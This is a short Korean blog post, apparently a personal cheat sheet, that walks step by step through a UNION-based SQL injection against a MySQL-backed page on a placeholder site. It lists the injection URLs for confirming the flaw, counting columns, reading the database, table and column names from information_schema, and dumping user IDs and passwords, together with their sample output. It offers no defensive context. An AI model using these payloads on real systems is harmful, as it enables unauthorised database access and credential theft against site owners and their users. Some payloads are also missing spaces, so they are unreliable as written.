애드센스


UNION SQL injection ┗ MySQL

1. 취약점 확인
http://www.test.com
/article.php?id=1'
=> dbms 오류

2. 컬럼 개수 취득
http://www.test.com/article.php?id=1order by 1 (true)
http://www.test.com/article.php?id=1order by 5 (false)
http://www.test.com/article.php?id=1order by 4 (true)

3. 데이터베이스 명 취득
http://www.test.com/article.php?id=-1union select null,null,null,database()
=> article

4. 데이터베이스(article) 테이블 명 취득
http://www.test.com/article.php?id=-1union select null,null,null,group_concat(distinct table_name SEPARATOR ' ') FROM information_schema.columns WHERE table_schema='article'
=> news permissions profiles roles users users_roles

5. 데이터베이스(users) 컬럼명 취득
http://www.test.com/article.php?id=-1union select null,null,null,group_concat(distinct column_name SEPARATOR ' ') FROM information_schema.columns WHERE table_schema='article' AND table_name='users'--
=> id username fullname enc_password

6. 데이터 취득
http://www.test.com/article.php?id=-1union select null,null,null,group_concat(id,0x3a,enc_password SEPARATOR '<br />') FROM article.users--
=> admin:admin
     test:1234

덧글

댓글 입력 영역


Facebook

통계 위젯 (화이트)

282274
1296
501618

구글